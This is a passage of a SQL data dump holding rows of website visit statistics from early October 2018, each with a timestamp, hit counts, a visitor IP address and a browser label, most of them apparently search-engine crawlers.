'),(311950,1538645633,1,1,0,0,'54.36.148.155','other'),(311951,1538645636,1,1,0,0,'54.36.148.162','other'),(311952,1538645823,1,1,0,0,'54.36.148.123','other'),(311953,1538645846,1,1,0,0,'91.196.178.50','chrome'),(311954,1538646207,1,1,0,0,'66.249.64.201','chrome'),(311955,1538646283,1,1,0,0,'141.8.183.23','other'),(311956,1538646309,1,1,0,0,'141.8.142.103','other'),(311957,1538646428,1,1,0,0,'8.29.198.25','other'),(311958,1538646808,1,1,0,0,'54.36.149.95','other'),(311959,1538646907,1,1,0,0,'54.36.148.125','other'),(311960,1538646940,1,1,0,0,'54.36.149.88','other'),(311961,1538647032,1,1,0,0,'54.36.149.101','other'),(311962,1538647243,1,1,0,0,'178.154.244.11','other'),(311963,1538647448,1,1,0,0,'54.36.148.202','other'),(311964,1538647503,2,2,0,0,'178.154.244.29','other'),(311965,1538647586,1,1,0,0,'54.36.148.71','other'),(311966,1538647867,1,1,0,0,'54.36.149.12','other'),(311967,1538648002,1,1,0,0,'66.249.64.199','chrome'),(311968,1538648018,1,1,0,0,'54.36.149.75','other'),(311969,1538648360,1,1,0,0,'5.45.207.19','other'),(311970,1538648383,1,1,0,0,'54.36.149.50','other'),(311971,1538648433,1,1,0,0,'54.36.149.99','other'),(311972,1538648529,1,1,0,0,'54.36.149.39','other'),(311973,1538648693,2,2,0,0,'54.36.149.71','other'),(311974,1538648790,2,2,0,0,'216.244.66.241','other'),(311975,1538648835,1,1,0,0,'54.36.148.13','other'),(311976,1538648900,1,1,0,0,'54.36.148.105','other'),(311977,1538649042,1,1,0,0,'157.55.39.135','other'),(311978,1538649172,3,3,0,0,'178.154.244.29','other'),(311979,1538649297,1,1,0,0,'178.93.2.103','chrome'),(311980,1538649547,1,1,0,0,'5.45.207.79','other'),(311981,1538649554,1,0,1,0,'66.249.64.61',''),(311982,1538649838,1,1,0,0,'54.36.148.135','other'),(311983,1538649998,1,1,0,0,'5.45.207.19','other'),(311984,1538650127,1,1,0,0,'178.154.244.11','other'),(311985,1538650151,1,1,0,0,'54.36.149.91','other'),(311986,1538650342,1,1,0,0,'54.36.148.165','other'),(311987,1538650346,1,1,0,0,'54.36.148.58','other'),(311988,1538650807,1,1,0,0,'54.36.148.25','other'),(311989,1538650944,2,2,0,0,'216.244.66.241','other'),(311990,1538651011,1,1,0,0,'207.46.13.120','other'),(311991,1538651044,1,1,0,0,'66.249.64.201','chrome'),(311992,1538651162,1,1,0,0,'54.36.148.33','other'),(311993,1538651470,1,1,0,0,'54.36.148.250','other'),(311994,1538651496,1,1,0,0,'66.249.64.195','chrome'),(311995,1538651562,1,1,0,0,'54.36.148.28','other'),(311996,1538651568,1,1,0,0,'54.36.148.194','other'),(311997,1538651776,1,1,0,0,'54.36.148.178','other'),(311998,1538651824,1,1,0,0,'54.36.148.116','other'),(311999,1538651909,1,1,0,0,'54.36.149.61','other'),(312000,1538652155,1,1,0,0,'54.36.148.124','other'),(312001,1538652310,1,1,0,0,'54.36.148.75','other'),(312002,1538652415,2,2,0,0,'193.106.30.98','other'),(312003,1538652503,2,2,0,0,'8.29.198.25','other'),(312004,1538652520,1,1,0,0,'54.36.149.97','other'),(312005,1538652760,1,1,0,0,'91.209.11.236','other'),(312006,1538652892,1,1,0,0,'37.17.172.132','firefox'),(312007,1538652945,1,1,0,0,'54.36.149.98','other'),(312008,1538653207,1,1,0,0,'54.36.148.51','other'),(312009,1538653310,1,1,0,0,'54.36.149.42','other'),(312010,1538653398,1,1,0,0,'54.36.148.54','other'),(312011,1538653430,1,1,0,0,'54.36.148.240','other'),(312012,1538653570,1,1,0,0,'216.244.66.241','other'),(312013,1538653942,1,1,0,0,'54.36.148.142','other'),(312014,1538654060,1,1,0,0,'54.36.148.88','other'),(312015,1538654417,1,1,0,0,'54.36.148.66','other'),(312016,1538654682,1,1,0,0,'54.36.149.48','other'),(312017,1538654937,1,1,0,0,'54.36.148.215','other'),(312018,1538655002,1,1,0,0,'54.36.148.200','other'),(312019,1538655005,1,1,0,0,'54.36.148.192','other'),(312020,1538655110,1,1,0,0,'37.53.228.75','chrome'),(312021,1538655479,1,1,0,0,'54.36.148.36','other'),(312022,1538655734,1,1,0,0,'54.36.148.204','other'),(312023,1538655920,1,1,0,0,'54.36.148.41','other'),(312024,1538656038,1,1,0,0,'54.36.148.58','other'),(312025,1538656083,1,1,0,0,'54.36.149.80','other'),(312026,1538656138,1,1,0,0,'37.52.162.200','opera'),(312027,1538656861,1,1,0,0,'54.36.149.53','other'),(312028,1538656869,1,1,0,0,'54.36.149.31','other'),(312029,1538656912,1,1,0,0,'54.36.148.215','other'),(312030,1538657088,1,1,0,0,'54.36.148.93','other'),(312031,1538657263,1,1,0,0,'8.29.198.25','other'),(312032,1538657577,1,1,0,0,'54.36.148.129','other'),(312033,1538657629,1,1,0,0,'216.244.66.241','other'),(312034,1538657765,1,1,0,0,'54.36.148.67','other'),(312035,1538658504,1,1,0,0,'54.36.148.153','other'),(312036,1538658547,1,1,0,0,'37.55.189.139','chrome'),(312037,1538658978,1,1,0,0,'54.36.148.61','other'),(312038,1538659295,1,1,0,0,'37.55.105.236','chrome'),(312039,1538659547,1,1,0,0,'180.76.15.145','other'),(312040,1538659615,1,1,0,0,'54.36.148.239','other'),(312041,1538659664,1,1,0,0,'91.196.178.189','chrome'),(312042,1538659723,1,1,0,0,'54.36.149.73','other'),(312043,1538660384,1,1,0,0,'54.36.149.68','other'),(312044,1538660555,1,1,0,0,'54.36.148.191','other'),(312045,1538660956,1,1,0,0,'54.36.148.161','other'),(312046,1538661115,1,1,0,0,'54.36.148.213','other'),(312047,1538661268,1,1,0,0,'54.36.148.154','other'),(312048,1538661433,1,1,0,0,'54.36.149.86','other'),(312049,1538661532,1,1,0,0,'54.36.149.97','other'),(312050,1538661547,1,1,0,0,'180.76.15.135','other'),(312051,1538661772,1,1,0,0,'54.36.149.83','other'),(312052,1538661881,1,1,0,0,'54.36.148.136','other'),(312053,1538662057,1,1,0,0,'91.196.177.46','firefox'),(312054,1538662241,1,1,0,0,'54.36.148.93','other'),(312055,1538662282,1,1,0,0,'54.36.149.0','other'),(312056,1538662351,1,1,0,0,'54.36.149.36','other'),(312057,1538662640,3,3,0,0,'178.154.244.29','other'),(312058,1538662724,1,1,0,0,'54.36.148.101','other'),(312059,1538663137,1,1,0,0,'54.36.149.88','other'),(312060,1538663200,1,1,0,0,'54.36.148.64','other'),(312061,1538663206,1,1,0,0,'54.36.149.99','other'),(312062,1538663232,1,1,0,0,'54.36.148.56','other'),(312063,1538663269,1,1,0,0,'54.36.148.21','other'),(312064,1538663326,1,1,0,0,'8.29.198.26','other'),(312065,1538663497,1,1,0,0,'54.36.148.17','other'),(312066,1538663534,1,1,0,0,'54.36.148.122','other'),(312067,1538663552,1,1,0,0,'54.36.148.160','other'),(312068,1538663561,1,1,0,0,'66.249.64.201','chrome'),(312069,1538663611,4,4,0,0,'178.154.244.29','other'),(312071,1538663613,1,1,0,0,'8.29.198.27','other'),(312072,1538663638,1,1,0,0,'95.108.213.4','other'),(312073,1538663671,1,1,0,0,'87.250.224.65','other'),(312074,1538663969,2,2,0,0,'216.244.66.241','other'),(312075,1538663989,1,1,0,0,'54.36.148.204','other'),(312076,1538664167,1,1,0,0,'54.36.148.57','other'),(312077,1538664364,1,1,0,0,'54.36.148.26','other'),(312078,1538664397,1,1,0,0,'52.53.201.78','chrome'),(312079,1538664416,1,1,0,0,'178.154.244.11','other'),(312080,1538664454,1,1,0,0,'5.45.207.79','other'),(312081,1538664530,1,1,0,0,'54.36.148.77','other'),(312082,1538664691,1,1,0,0,'54.36.149.25','other'),(312083,1538664760,1,1,0,0,'54.36.148.234','other'),(312084,1538664812,1,1,0,0,'157.55.39.171','other'),(312085,1538665024,1,1,0,0,'54.36.148.79','other'),(312086,1538665044,1,1,0,0,'54.36.148.197','other'),(312087,1538665587,1,1,0,0,'54.36.148.239','other'),(312088,1538665605,1,1,0,0,'54.36.149.8','other'),(312089,1538665615,1,1,0,0,'54.36.148.90','other'),(312090,1538665742,1,1,0,0,'188.230.43.254','other'),(312091,1538666035,1,1,0,0,'93.183.196.184','firefox'),(312092,1538666091,1,1,0,0,'54.36.148.35','other'),(312093,1538667227,1,1,0,0,'54.36.149.77','other'),(312094,1538667269,1,1,0,0,'157.55.39.187','other'),(312095,1538667699,1,1,0,0,'54.36.148.195','other'),(312096,1538667893,1,1,0,0,'54.36.148.253','other'),(312097,1538667924,1,1,0,0,'66.249.69.145','chrome'),(312098,1538668114,1,1,0,0,'8.29.198.26','other'),(312099,1538668148,1,1,0,0,'188.230.43.254','other'),(312100,1538668457,1,1,0,0,'54.176.22.71','chrome'),(312101,1538668462,2,2,0,0,'54.36.149.58','other'),(312102,1538668641,1,1,0,0,'54.36.148.43','other'),(312103,1538668828,1,1,0,0,'54.36.148.127','other'),(312104,1538669080,1,1,0,0,'54.36.148.39','other'),(312105,1538669366,1,1,0,0,'54.36.148.23','other'),(312106,1538669393,1,1,0,0,'5.45.207.19','other'),(312107,1538669397,1,1,0,0,'178.154.244.11','other'),(312108,1538669433,1,1,0,0,'54.36.148.133','other'),(312109,1538669582,1,1,0,0,'54.36.149.21','other'),(312110,1538669611,1,1,0,0,'54.36.148.30','other'),(312111,1538669723,1,1,0,0,'46.219.2.9','chrome'),(312112,1538670134,1,1,0,0,'66.249.69.221','chrome'),(312113,1538670222,1,1,0,0,'13.66.139.0','other'),(312114,1538670396,1,1,0,0,'54.36.148.25','other'),(312115,1538670496,1,1,0,0,'40.77.167.153','other'),(312116,1538670542,1,1,0,0,'188.230.43.254','other'),(312117,1538670591,1,1,0,0,'54.36.149.20','other'),(312118,1538670901,1,1,0,0,'54.36.148.216','other'),(312119,1538671009,1,1,0,0,'66.249.69.144','chrome'),(312120,1538671050,1,1,0,0,'54.36.148.118','other'),(312121,1538671184,1,1,0,0,'54.36.148.193','other'),(312122,1538671267,1,1,0,0,'54.36.148.140','other'),(312123,1538671335,1,1,0,0,'54.36.148.138','other'),(312124,1538671521,1,1,0,0,'54.36.149.45','other'),(312125,1538671644,1,1,0,0,'54.36.149.107','other'),(312126,1538671933,1,1,0,0,'54.36.149.8','other'),(312127,1538672104,1,1,0,0,'54.36.148.198','other'),(312128,1538672276,1,1,0,0,'157.55.39.187','other'),(312129,1538672777,1,1,0,0,'66.249.69.217','chrome'),(312130,1538672880,1,1,0,0,'54.36.148.126','other'),(312131,1538672960,1,1,0,0,'54.36.148.60','other'),(312132,1538672970,1,1,0,0,'54.36.148.161','other'),(312133,1538672975,1,1,0,0,'54.36.148.80','other'),(312134,1538673159,1,1,0,0,'188.230.43.254','other'),(312135,1538673462,1,1,0,0,'54.36.148.46','other'),(312136,1538673505,1,1,0,0,'54.36.148.54','other'),(312137,1538673776,1,1,0,0,'54.36.148.15','other'),(312138,1538673831,1,1,0,0,'37.17.172.132','firefox'),(312139,1538673892,1,1,0,0,'54.36.148.106','other'),(312140,1538674073,1,1,0,0,'54.36.149.10','other'),(312141,1538674153,1,1,0,0,'8.29.198.25','other'),(312142,1538674250,1,1,0,0,'54.36.149.24','other'),(312143,1538674368,1,1,0,0,'91.210.147.116','chrome'),(312144,1538674450,1,1,0,0,'8.29.198.27','other'),(312145,1538674647,1,1,0,0,'91.196.178.165','chrome'),(312146,1538674864,1,1,0,0,'37.54.23.36','chrome'),(312147,1538674871,1,1,0,0,'66.249.69.144','chrome'),(312148,1538675153,1,1,0,0,'54.36.148.74','other'),(312149,1538675220,1,1,0,0,'54.36.148.93','other'),(312150,1538675224,1,1,0,0,'54.36.149.11','other'),(312151,1538675462,1,1,0,0,'54.36.149.98','other'),(312152,1538675474,1,1,0,0,'54.36.148.237','other'),(312153,1538675509,1,1,0,0,'216.244.66.241','other'),(312154,1538675652,1,1,0,0,'54.36.148.43','other'),(312155,1538675708,1,1,0,0,'54.36.148.180','other'),(312156,1538675931,1,1,0,0,'94.178.7.180','chrome'),(312157,1538676234,1,1,0,0,'54.36.149.25','other'),(312158,1538676722,1,1,0,0,'54.36.148.232','other'),(312159,1538677318,1,1,0,0,'54.36.148.108','other'),(312160,1538677659,1,1,0,0,'91.196.178.181','chrome'),(312161,1538677742,1,1,0,0,'54.36.148.18','other'),(312162,1538677750,1,1,0,0,'54.36.148.50','other'),(312163,1538677785,1,1,0,0,'54.36.149.94','other'),(312164,1538677846,1,1,0,0,'54.36.149.33','other'),(312165,1538677866,1,1,0,0,'54.36.148.244','other'),(312166,1538678099,1,1,0,0,'54.36.149.71','other'),(312167,1538678246,1,1,0,0,'176.113.159.72','chrome'),(312168,1538678587,1,1,0,0,'54.36.149.68','other'),(312169,1538678606,1,1,0,0,'54.36.148.62','other'),(312170,1538678679,1,1,0,0,'54.36.148.81','other'),(312171,1538678757,1,1,0,0,'54.36.148.40','other'),(312172,1538678809,1,1,0,0,'54.36.148.19','other'),(312173,1538678949,1,1,0,0,'8.29.198.27','other'),(312174,1538678996,1,1,0,0,'54.36.148.126','other'),(312175,1538679108,1,1,0,0,'54.36.148.94','other'),(312176,1538679347,1,1,0,0,'54.36.148.102','other'),(312177,1538679573,1,1,0,0,'54.36.149.106','other'),(312178,1538679673,1,1,0,0,'54.36.149.92','other'),(312179,1538679721,1,1,0,0,'54.36.148.113','other'),(312180,1538679820,1,1,0,0,'54.36.148.58','other'),(312181,1538680106,1,1,0,0,'54.36.149.60','other'),(312182,1538680205,1,1,0,0,'54.36.148.228','other'),(312183,1538680429,1,1,0,0,'54.36.148.204','other'),(312184,1538680463,1,1,0,0,'54.36.148.86','other'),(312185,1538680491,1,1,0,0,'54.36.148.245','other'),(312186,1538680895,1,1,0,0,'54.36.148.227','other'),(312187,1538681149,1,1,0,0,'54.36.148.222','other'),(312188,1538681422,1,1,0,0,'54.36.148.18','other'),(312189,1538681993,1,1,0,0,'40.77.167.208','other'),(312190,1538682093,1,1,0,0,'157.55.39.187','other'),(312191,1538682135,1,1,0,0,'54.36.148.158','other'),(312192,1538682355,1,1,0,0,'54.36.148.123','other'),(312193,1538682700,1,1,0,0,'54.36.148.177','other'),(312194,1538682957,1,1,0,0,'54.36.148.74','other'),(312195,1538683292,1,1,0,0,'54.36.149.74','other'),(312196,1538683472,1,1,0,0,'54.36.148.35','other'),(312197,1538683535,1,1,0,0,'54.36.148.22','other'),(312198,1538683952,1,1,0,0,'54.36.148.203','other'),(312199,1538684006,1,1,0,0,'54.36.149.51','other'),(312200,1538684285,1,1,0,0,'54.36.148.54','other'),(312201,1538684587,1,1,0,0,'54.36.148.150','other'),(312202,1538684598,1,1,0,0,'54.36.148.22','other'),(312203,1538684677,1,1,0,0,'216.244.66.241','other'),(312204,1538684699,1,1,0,0,'54.36.149.88','other'),(312205,1538684977,1,1,0,0,'8.29.198.26','other'),(312206,1538684990,1,1,0,0,'54.36.148.170','other'),(312207,1538684997,1,1,0,0,'66.249.69.221','chrome'),(312208,1538685099,1,1,0,0,'54.36.148.96','other'),(312209,1538685280,1,1,0,0,'8.29.198.25','other'),(312210,1538685576,1,1,0,0,'54.36.149.10','other'),(312211,1538685630,1,1,0,0,'54.36.148.94','other'),(312212,1538685667,1,1,0,0,'54.36.149.22','other'),(312213,1538685730,1,1,0,0,'54.36.149.37','other'),(312214,1538685915,1,1,0,0,'54.36.148.242','other'),(312215,1538686016,1,1,0,0,'54.36.148.76','other'),(312216,1538686102,1,1,0,0,'54.36.148.146','other'),(312217,1538686149,1,1,0,0,'54.36.148.154','other'),(312218,1538686557,2,2,0,0,'178.154.244.11','other'),(312219,1538686567,2,2,0,0,'178.154.244.29','other'),(312220,1538686681,1,1,0,0,'157.55.39.187','other'),(312221,1538686722,1,1,0,0,'54.36.148.172','other'),(312222,1538686743,1,1,0,0,'66.249.69.219','chrome'),(312223,1538686752,1,1,0,0,'54.36.148.177','other'),(312224,1538686939,1,1,0,0,'40.77.167.153','other'),(312225,1538686992,1,1,0,0,'54.36.149.21','other'),(312226,1538687051,2,2,0,0,'5.45.207.79','other'),(312227,1538687513,1,1,0,0,'54.36.148.77','other'),(312228,1538687605,2,2,0,0,'54.36.149.26','other'),(312229,1538687723,1,1,0,0,'176.111.182.103','firefox'),(312230,1538687797,1,1,0,0,'40.77.167.8','other'),(312231,1538687997,1,1,0,0,'54.36.149.46','other'),(312232,1538688018,1,1,0,0,'54.36.148.150','other'),(312233,1538688131,1,1,0,0,'54.36.148.203','other'),(312234,1538688881,1,1,0,0,'54.36.148.140','other'),(312235,1538688898,1,1,0,0,'54.36.148.231','other'),(312236,1538689014,1,1,0,0,'54.36.149.75','other'),(312237,1538689073,1,1,0,0,'54.36.148.59','other'),(312238,1538689522,1,1,0,0,'178.154.244.29','other'),(312239,1538689706,1,1,0,0,'54.36.148.230','other'),(312240,1538689781,1,1,0,0,'8.29.198.27','other'),(312241,1538690046,1,1,0,0,'54.36.148.170','other'),(312242,1538690075,1,1,0,0,'54.36.148.250','other'),(312243,1538690385,2,2,0,0,'216.244.66.241','other'),(312244,1538690741,1,1,0,0,'54.36.148.142','other'),(312245,1538690777,1,1,0,0,'54.36.148.35','other'),(312246,1538691117,1,1,0,0,'54.36.148.185','other'),(312247,1538691307,1,1,0,0,'216.244.66.241','other'),(312248,1538691665,1,1,0,0,'54.36.149.73','other'),(312249,1538691930,1,1,0,0,'54.36.149.17','other'),(312250,1538692005,1,1,0,0,'54.36.149.21','other'),(312251,1538692132,1,1,0,0,'54.36.148.105','other'),(312252,1538692289,1,1,0,0,'54.36.148.90','other'),(312253,1538692403,1,1,0,0,'144.76.119.201','other'),(312254,1538692465,1,1,0,0,'54.36.148.197','other'),(312255,1538692758,6,6,0,0,'95.216.6.46','other'),(312256,1538692838,1,1,0,0,'54.36.148.45','other'),(312257,1538692965,1,1,0,0,'54.36.149.32','other'),(312258,1538693357,1,1,0,0,'54.36.148.69','other'),(312259,1538693364,1,1,0,0,'54.36.149.87','other'),(312260,1538693432,1,1,0,0,'54.36.149.78','other'),(312261,1538693437,1,1,0,0,'178.154.244.11','other'),(312262,1538693520,1,1,0,0,'54.36.148.66','other'),(312263,1538693547,1,1,0,0,'54.36.148.216','other'),(312264,1538693737,1,1,0,0,'54.36.148.168','other'),(312265,1538693771,1,1,0,0,'54.36.148.220','other'),(312266,1538693779,1,1,0,0,'62.210.110.181','other'),(312267,1538693952,1,1,0,0,'54.36.148.136','other'),(312268,1538693991,1,1,0,0,'54.36.149.40','other'),(312269,1538694050,1,1,0,0,'54.36.149.42','other'),(312270,1538694108,1,1,0,0,'54.36.148.47','other'),(312271,1538694374,1,1,0,0,'54.36.148.65','other'),(312272,1538694521,1,1,0,0,'54.36.149.21','other'),(312273,1538694528,1,1,0,0,'54.36.148.176','other'),(312274,1538694752,1,1,0,0,'54.36.148.110','other'),(312275,1538695075,1,1,0,0,'54.36.149.61','other'),(312276,1538695313,1,1,0,0,'216.244.66.241','other'),(312277,1538695497,2,2,0,0,'54.36.148.218','other'),(312278,1538695655,1,1,0,0,'54.36.148.131','other'),(312279,1538695656,1,1,0,0,'54.36.149.93','other'),(312280,1538695805,1,1,0,0,'8.29.198.25','other'),(312281,1538695968,1,1,0,0,'54.36.149.6','other'),(312282,1538696105,1,1,0,0,'8.29.198.26','other'),(312283,1538696214,1,1,0,0,'54.36.148.150','other'),(312284,1538696550,1,1,0,0,'54.36.148.83','other'),(312285,1538696716,1,1,0,0,'54.36.148.19','other'),(312286,1538696899,1,1,0,0,'54.36.148.224','other'),(312287,1538696951,1,1,0,0,'54.36.148.230','other'),(312288,1538696994,1,1,0,0,'54.36.149.92','other'),(312289,1538697016,1,1,0,0,'54.36.149.87','other'),(312290,1538697620,1,1,0,0,'157.55.39.187','other'),(312291,1538697680,1,1,0,0,'54.36.149.65','other'),(312292,1538698081,1,1,0,0,'54.36.148.111','other'),(312293,1538698417,1,1,0,0,'54.36.148.245','other'),(312294,1538698772,1,1,0,0,'54.36.148.51','other'),(312295,1538699043,1,1,0,0,'94.45.190.36','chrome'),(312296,1538699131,1,1,0,0,'216.244.66.241','other'),(312297,1538699475,1,1,0,0,'54.36.148.69','other'),(312298,1538699634,1,1,0,0,'54.36.149.25','other'),(312299,1538699799,1,1,0,0,'66.249.69.144','chrome'),(312300,1538699911,1,1,0,0,'54.36.148.176','other'),(312301,1538700148,1,1,0,0,'54.36.148.11','other'),(312302,1538700284,1,1,0,0,'66.249.69.145','chrome'),(312303,1538700457,1,1,0,0,'54.36.149.74','other'),(312304,1538700601,1,1,0,0,'216.244.66.241','other'),(312305,1538700619,1,1,0,0,'8.29.198.26','other'),(312306,1538700943,1,1,0,0,'54.36.149.80','other'),(312307,1538701307,1,1,0,0,'54.36.149.97','other'),(312308,1538701361,1,1,0,0,'54.36.148.164','other'),(312309,1538701527,1,1,0,0,'54.36.148.85','other'),(312310,1538701848,1,1,0,0,'54.36.148.99','other'),(312311,1538702063,1,1,0,0,'54.36.148.47','other'),(312312,1538702310,1,1,0,0,'54.36.148.132','other'),(312313,1538702349,14,14,0,0,'40.77.167.153','other'),(312314,1538702487,1,1,0,0,'178.255.215.94','other'),(312315,1538702494,1,1,0,0,'54.36.149.102','other'),(312316,1538702684,1,1,0,0,'54.36.148.173','other'),(312317,1538702762,6,6,0,0,'157.55.39.187','other'),(312318,1538702772,11,11,0,0,'157.55.39.163','other'),(312319,1538702786,2,2,0,0,'54.36.148.62','other'),(312320,1538702809,9,9,0,0,'40.77.167.8','other'),(312321,1538702941,1,1,0,0,'54.36.149.16','other'),(312322,1538703133,1,1,0,0,'54.36.149.85','other'),(312323,1538703137,1,1,0,0,'54.36.148.182','other'),(312324,1538703325,1,1,0,0,'54.36.148.166','other'),(312325,1538703707,1,1,0,0,'54.36.149.0','other'),(312326,1538703758,1,1,0,0,'54.36.149.12','other'),(312327,1538703784,1,1,0,0,'54.36.148.176','other'),(312328,1538703839,1,1,0,0,'54.36.148.164','other'),(312329,1538703892,1,1,0,0,'54.36.149.89','other'),(312330,1538704915,1,1,0,0,'54.36.149.49','other'),(312331,1538705297,1,1,0,0,'13.66.139.0','other'),(312332,1538705501,1,1,0,0,'188.32.141.220','msie'),(312333,1538705507,1,1,0,0,'54.36.149.82','other'),(312334,1538705532,1,1,0,0,'54.36.148.118','other'),(312335,1538705687,1,1,0,0,'54.36.148.128','other'),(312336,1538705874,1,1,0,0,'54.36.148.185','other'),(312337,1538706087,1,1,0,0,'157.55.39.187','other'),(312338,1538706510,1,1,0,0,'54.36.148.56','other'),(312339,1538706629,1,1,0,0,'8.29.198.27','other'),(312340,1538706847,1,1,0,0,'54.36.149.77','other'),(312341,1538706899,1,1,0,0,'54.36.148.252','other'),(312342,1538706936,1,1,0,0,'8.29.198.26','other'),(312343,1538707112,1,1,0,0,'54.36.148.158','other'),(312344,1538707512,1,1,0,0,'54.36.149.107','other'),(312345,1538707602,1,1,0,0,'66.249.69.217','chrome'),(312346,1538707791,1,1,0,0,'54.36.149.83','other'),(312347,1538707854,1,1,0,0,'91.196.178.48','chrome'),(312348,1538707930,1,1,0,0,'54.36.148.231','other'),(312349,1538708014,1,1,0,0,'54.36.148.25','other'),(312350,1538708311,1,1,0,0,'54.36.148.215','other'),(312351,1538708746,1,1,0,0,'54.36.148.222','other'),(312352,1538708815,1,1,0,0,'54.36.149.76','other'),(312353,1538708879,1,1,0,0,'54.36.148.60','other'),(312354,1538708915,1,1,0,0,'54.36.148.220','other'),(312355,1538708962,1,1,0,0,'37.17.172.132','firefox'),(312356,1538709204,1,1,0,0,'54.36.149.103','other'),(312357,1538709492,1,1,0,0,'216.244.66.241','other'),(312358,1538709598,1,1,0,0,'66.249.69.219','chrome'),(312359,1538709854,1,1,0,0,'54.36.148.33','other'),(312360,1538709927,1,1,0,0,'54.36.148.73','other'),(312361,1538710106,1,1,0,0,'54.36.148.38','other'),(312362,1538710242,1,1,0,0,'54.36.149.2','other'),(312363,1538710410,1,1,0,0,'106.75.140.51','chrome'),(312364,1538710626,1,1,0,0,'180.76.15.158','other'),(312365,1538710771,1,1,0,0,'54.36.148.169','other'),(312366,1538710918,1,1,0,0,'54.36.149.105','other'),(312367,1538711221,3,3,0,0,'178.154.244.29','other'),(312368,1538711248,1,1,0,0,'54.36.149.36','other'),(312369,1538711250,1,1,0,0,'37.9.113.148','other'),(312370,1538711325,1,1,0,0,'54.36.148.12','other'),(312371,1538711340,1,1,0,0,'216.244.66.241','other'),(312372,1538711446,1,1,0,0,'8.29.198.27','other'),(312373,1538711496,1,1,0,0,'5.45.207.19','other'),(312374,1538711637,1,1,0,0,'54.36.148.224','other'),(312375,1538711700,3,3,0,0,'178.154.244.11','other'),(312376,1538711703,1,1,0,0,'141.8.142.103','other'),(312377,1538711919,1,1,0,0,'54.36.149.40','other'),(312378,1538712051,1,1,0,0,'54.36.149.42','other'),(312379,1538712256,5,5,0,0,'178.154.244.29','other'),(312380,1538712277,1,1,0,0,'54.36.149.59','other'),(312381,1538712412,1,1,0,0,'54.36.149.11','other'),(312382,1538712516,2,2,0,0,'5.45.207.79','other'),(312383,1538712532,1,1,0,0,'5.45.207.19','other'),(312384,1538712620,1,1,0,0,'54.36.149.95','other'),(312385,1538712654,1,1,0,0,'54.36.148.170','other'),(312386,1538712709,1,1,0,0,'54.36.149.67','other'),(312387,1538712950,1,1,0,0,'54.36.149.25','other'),(312388,1538713015,2,2,0,0,'54.36.148.205','other'),(312389,1538713072,2,2,0,0,'178.154.244.11','other'),(312390,1538713177,1,1,0,0,'54.36.148.212','other'),(312391,1538713197,3,3,0,0,'178.154.244.29','other'),(312392,1538713593,1,1,0,0,'54.36.148.215','other'),(312393,1538713851,1,1,0,0,'54.36.148.216','other'),(312394,1538714266,1,1,0,0,'54.36.148.177','other'),(312395,1538714309,1,1,0,0,'5.45.207.19','other'),(312396,1538714331,1,1,0,0,'54.36.148.240','other'),(312397,1538714372,1,1,0,0,'54.36.148.12','other'),(312398,1538714399,1,1,0,0,'5.45.207.79','other'),(312399,1538714413,2,2,0,0,'178.154.244.29','other'),(312400,1538714607,1,1,0,0,'54.36.148.25','other'),(312401,1538714715,1,1,0,0,'216.244.66.241','other'),(312402,1538715142,1,1,0,0,'54.36.149.80','other'),(312403,1538715410,1,1,0,0,'54.36.149.95','other'),(312404,1538715940,1,1,0,0,'216.244.66.241','other'),(312405,1538716446,1,1,0,0,'180.76.15.10','other'),(312406,1538716689,1,1,0,0,'178.154.244.29','other'),(312407,1538716781,2,2,0,0,'36.248.161.207','chrome'),(312408,1538717445,1,1,0,0,'8.29.198.27','other'),(312409,1538717769,1,1,0,0,'8.29.198.25','other'),(312410,1538718340,1,1,0,0,'216.244.66.241','other'),(312411,1538718562,1,1,0,0,'178.93.2.103','chrome'),(312412,1538718620,1,1,0,0,'66.249.69.144','chrome'),(312413,1538718939,1,1,0,0,'193.110.23.144','chrome'),(312414,1538719880,1,1,0,0,'54.36.148.10','other'),(312415,1538720082,1,1,0,0,'216.244.66.241','other'),(312416,1538720465,1,1,0,0,'54.36.148.153','other'),(312417,1538720619,1,1,0,0,'54.36.148.102','other'),(312418,1538721026,1,1,0,0,'66.249.69.217','chrome'),(312419,1538721169,1,1,0,0,'37.54.114.62','chrome'),(312420,1538721172,1,1,0,0,'212.1.64.8','chrome'),(312421,1538721234,1,1,0,0,'66.249.69.144','chrome'),(312422,1538721281,1,1,0,0,'54.36.149.70','other'),(312423,1538721431,1,1,0,0,'54.36.148.191','other'),(312424,1538721915,1,1,0,0,'54.36.149.9','other'),(312425,1538722011,1,1,0,0,'91.196.177.110','chrome'),(312426,1538722136,1,1,0,0,'54.36.148.38','other'),(312427,1538722226,1,1,0,0,'54.36.149.15','other'),(312428,1538722262,1,1,0,0,'54.36.148.116','other'),(312429,1538722278,1,1,0,0,'8.29.198.27','other'),(312430,1538722569,1,1,0,0,'54.36.148.99','other'),(312431,1538722659,1,1,0,0,'54.36.149.7','other'),(312432,1538722700,1,1,0,0,'54.36.148.237','other'),(312433,1538722787,1,1,0,0,'54.36.148.47','other'),(312434,1538722805,1,1,0,0,'54.36.148.18','other'),(312435,1538723191,1,1,0,0,'31.43.31.17','chrome'),(312436,1538723291,1,1,0,0,'54.36.148.154','other'),(312437,1538723434,1,1,0,0,'54.36.148.250','other'),(312438,1538723615,1,1,0,0,'54.193.116.50','chrome'),(312439,1538723631,1,1,0,0,'64.246.165.160','firefox'),(312440,1538723866,1,1,0,0,'54.36.149.104','other'),(312441,1538724067,1,1,0,0,'54.36.148.151','other'),(312442,1538724191,1,1,0,0,'193.106.30.98','firefox'),(312443,1538724332,1,1,0,0,'54.36.148.63','other'),(312444,1538724499,1,1,0,0,'54.36.149.34','other'),(312445,1538725193,1,1,0,0,'54.36.148.124','other'),(312446,1538725230,1,1,0,0,'91.196.178.92','chrome'),(312447,1538725323,1,1,0,0,'54.36.148.160','other'),(312448,1538725831,1,1,0,0,'54.36.148.12','other'),(312449,1538725962,1,1,0,0,'178.154.244.29','other'),(312450,1538726369,1,1,0,0,'54.36.148.110','other'),(312451,1538726508,1,1,0,0,'54.36.148.49','other'),(312452,1538726804,1,1,0,0,'54.36.149.14','other'),(312453,1538726917,1,1,0,0,'54.36.149.15','other'),(312454,1538727078,1,1,0,0,'95.132.9.27','firefox'),(312455,1538727451,1,1,0,0,'54.36.148.190','other'),(312456,1538727801,1,1,0,0,'54.36.149.77','other'),(312457,1538727915,1,1,0,0,'54.36.148.69','other'),(312458,1538727931,1,1,0,0,'54.36.149.89','other'),(312459,1538727948,1,1,0,0,'66.249.69.145','chrome'),(312460,1538728119,1,1,0,0,'54.36.149.100','other'),(312461,1538728261,2,2,0,0,'8.29.198.26','other'),(312462,1538728666,1,1,0,0,'91.196.178.72','chrome'),(312463,1538729313,1,1,0,0,'54.36.149.73','other'),(312464,153872